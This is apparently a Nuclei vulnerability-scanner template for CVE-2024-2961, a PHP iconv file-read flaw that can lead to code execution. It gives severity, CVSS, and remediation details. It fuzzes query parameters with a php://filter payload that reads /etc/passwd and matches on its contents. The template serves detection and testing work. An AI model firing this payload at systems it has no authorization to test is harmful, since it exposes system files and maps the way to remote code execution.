漏洞描述
PHP Local File Read vulnerability leading to Remote Code Execution
CVE-2024-2961: PHP - LFR to Remote Code Execution
PoC代码[已公开]
id: CVE-2024-2961
info:
name: PHP - LFR to Remote Code Execution
author: Kim Dongyoung (Kairos-hk),bolkv,n0ming,RoughBoy0723
severity: high
description: |
PHP Local File Read vulnerability leading to Remote Code Execution
impact: |
Remote attackers can execute arbitrary code on the server
remediation: |
Update PHP to the latest version and sanitize user input to prevent LFR attacks
reference:
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2024-2961
- https://nvd.nist.gov/vuln/detail/CVE-2024-2961
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
cvss-score: 7.3
cve-id: CVE-2024-2961
cwe-id: CWE-787
epss-score: 0.92618
epss-percentile: 0.99736
tags: cve,cve2024,php,iconv,glibc,lfr,rce,dast,vkev
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- '!regex("root:x:0:0", body)'
internal: true
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
- 'method == "POST"'
payloads:
phppayload:
- "php://filter/read=convert.iconv.UTF-8/ISO-2022-CN-EXT/resource=/etc/passwd"
stop-at-first-match: true
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{phppayload}}"
matchers:
- type: regex
regex:
- "root:x:0:0"
# digest: 4a0a00473045022100adb3ce06432135aefb62e8c2d4a8bc6839d9584bde514212ca2ea65c019b831f022041b17915ecdf958a305a3212de9e242dc2fa9c6b9b6036890749b83f17446a5e:922c64590222798bb761d5b6d8e72950